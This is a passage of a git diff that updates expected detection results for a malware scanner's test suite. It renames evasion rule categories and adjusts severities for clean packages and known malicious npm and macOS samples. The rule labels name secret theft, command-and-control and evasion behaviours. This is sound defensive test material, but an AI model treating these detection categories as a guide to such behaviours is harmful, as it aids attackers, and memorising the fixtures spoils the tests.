[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple
index 361c13843..2b81daa5e 100644
--- a/tests/linux/clean/rules.json.simple
+++ b/tests/linux/clean/rules.json.simple
@@ -38,7 +38,6 @@ exec/system_controls/apparmor: medium
 exec/tty/pathname: medium
 exfil: medium
 exfil/stealer/linux_server: high
-exfil/stealer/ssh: high
 fs/fifo_create: low
 fs/file/times_set: medium
 fs/lock_update: low
diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple
index 707fc77c4..c4fa65476 100644
--- a/tests/linux/clean/searchindex.json.simple
+++ b/tests/linux/clean/searchindex.json.simple
@@ -12,7 +12,7 @@ data/random/insecure: low
 discover/components/docker: medium
 discover/system/platform: low
 discover/system/sysinfo: medium
-evasion/hidden_paths/chdir_unusual: medium
+evasion/covert_location/chdir_unusual: medium
 evasion/hide_artifacts/system_directories: medium
 exec/install_additional/package_install: medium
 exec/install_additional/pip_install: medium
diff --git a/tests/linux/clean/securitySolution.chunk.9.js.simple b/tests/linux/clean/securitySolution.chunk.9.js.simple
index 073ed4452..6285b1a24 100644
--- a/tests/linux/clean/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/securitySolution.chunk.9.js.simple
@@ -35,7 +35,6 @@
 3P/threat_hunting/traitor: medium
 3P/threat_hunting/wpscan: medium
 anti-static/obfuscation/js/char_codes: medium
-c2/addr/ip: medium
 c2/addr/ip_port: medium
 c2/addr/php: medium
 c2/addr/url_unusual: high
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index 84e530930..b94546d85 100644
--- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -28,7 +28,7 @@ | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | -| MEDIUM | [evasion/hidden_paths/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | +| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | | MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) |
diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple
index daf94630e..c514a78a8 100644
--- a/tests/linux/clean/slirp4netns.simple
+++ b/tests/linux/clean/slirp4netns.simple
@@ -13,7 +13,7 @@ discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/dev_shm: medium
 evasion/hidden_paths/var_run: medium
 evasion/hide_artifacts/pivot_root: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple
index 1f87e4a19..79881766d 100644
--- a/tests/linux/clean/sonarlint-metadata.json.simple
+++ b/tests/linux/clean/sonarlint-metadata.json.simple
@@ -2,6 +2,7 @@
 3P/threat_hunting/bruteratel: medium
 3P/threat_hunting/github_username: medium
 3P/threat_hunting/owasp: medium
+c2/addr/ip: medium
 c2/addr/ip_port: medium
 c2/addr/php: medium
 collect/databases/mysql: medium
@@ -13,7 +14,7 @@ crypto/uuid: medium
 data/encoding/json_decode: low
 data/encoding/json_encode: low
 discover/network/interface_list: medium
-evasion/hidden_paths/dev_mqueue: medium
+evasion/covert_location/dev_mqueue: medium
 evasion/hidden_paths/hidden: medium
 exec/plugin: low
 exfil/stealer/credit_card: medium
diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple
index 0fa63a499..50c4fb0a8 100644
--- a/tests/linux/clean/sudo.simple
+++ b/tests/linux/clean/sudo.simple
@@ -34,6 +34,7 @@ net/socket/local_addr: low
 net/socket/receive: low
 net/socket/send: low
 os/kernel/seccomp: low
+privesc/sudoers: low
 process/chroot: low
 process/groupid_set: low
 process/groups_set: low
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index 9c0c8fc40..ebd3c6b79 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -61,8 +61,8 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/iptables: medium
-evasion/hidden_paths/chdir_unusual: medium
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/chdir_unusual: medium
+evasion/covert_location/dev_shm: medium
 evasion/hidden_paths/hidden: medium
 evasion/hidden_paths/var_run: medium
 exec/cmd: medium
diff --git a/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple b/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple
index e96af3d5e..36842d8a2 100644
--- a/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple
+++ b/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple
@@ -1,6 +1,5 @@
 # linux/clean/wikiticker-2015-09-12-sampled.json: high
 anti-behavior/blocklist/user: medium
-c2/addr/ip: medium
 c2/addr/ip_port: medium
 c2/addr/php: medium
 credential/gaming/minecraft: medium
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index 4deb84a60..62f070e43 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -53,7 +53,7 @@ discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/macos/xprotect: medium
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/dev_shm: medium
 evasion/hidden_paths/hidden: medium
 evasion/hide_artifacts/system_directories: medium
 exec/cmd: medium
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index f48ddfd6e..7e7f02018 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -26,7 +26,7 @@ exec/script/osa: medium
 exec/shell/exec: medium
 exfil/stealer/notes: critical
 exfil/stealer/office: high
-exfil/stealer/ssh: high
+exfil/stealer/ssh: medium
 fs/directory/create: low
 fs/directory/remove: low
 fs/file/delete: low
diff --git a/tests/npm/2024.distube-fast/postinstall.js.simple b/tests/npm/2024.distube-fast/postinstall.js.simple
index caa4286b2..be87fcf61 100644
--- a/tests/npm/2024.distube-fast/postinstall.js.simple
+++ b/tests/npm/2024.distube-fast/postinstall.js.simple
@@ -1,4 +1,5 @@
 # npm/2024.distube-fast/postinstall.js: critical
+c2/addr/ip: medium
 c2/tool_transfer/exe_url: critical
 c2/tool_transfer/js: critical
 fs/file/delete: low
diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple
index eaa2180c2..a89d73aa9 100644
--- a/tests/npm/2024.next-react-notify/tocall.js.simple
+++ b/tests/npm/2024.next-react-notify/tocall.js.simple
@@ -2,6 +2,7 @@ anti-static/obfuscation/batch/echo_off: high
 anti-static/obfuscation/powershell/bxor: critical
 c2/addr/http_ip: high
+c2/addr/ip: medium
 evasion/bypass_security/executionpolicy_bypass: high
 exec/shell/power: medium
 fs/file/delete: low
diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple
index ff8992b55..cadd7b7c5 100644
--- a/tests/npm/2024.persona-tool/preinstall.js.simple
+++ b/tests/npm/2024.persona-tool/preinstall.js.simple
@@ -1,5 +1,6 @@
 # npm/2024.persona-tool/preinstall.js: critical
 anti-static/obfuscation/generic/hex_conversion: medium
+c2/addr/ip: medium
 c2/discovery/ip_dns_resolver: medium
 data/encoding/json_encode: low
 discover/system/hostname_get: low
diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple
index 8aaab34c0..9507a5e9b 100644
--- a/tests/php/clean/composer-2.7.7.simple
+++ b/tests/php/clean/composer-2.7.7.simple
@@ -2,6 +2,7 @@ anti-behavior/anti_debugger: medium
 anti-static/obfuscation/php/non_printable_chars: medium
 c2/addr/http_dynamic: medium
+c2/addr/ip: medium
 c2/addr/ip_port: medium
 c2/addr/php: medium
 c2/discovery/ip_dns_resolver: medium
diff --git a/tests/python/clean/setuptools/build_meta.py.simple b/tests/python/clean/setuptools/build_meta.py.simple
index cee97b96d..2e2b367ca 100644
--- a/tests/python/clean/setuptools/build_meta.py.simple
+++ b/tests/python/clean/setuptools/build_meta.py.simple
@@ -1,6 +1,5 @@
 # python/clean/setuptools/build_meta.py: medium
 3P/threat_hunting/monkey: medium
-c2/addr/ip: medium
 c2/tool_transfer/download: medium
 c2/tool_transfer/github_raw: medium
 data/embedded/html: medium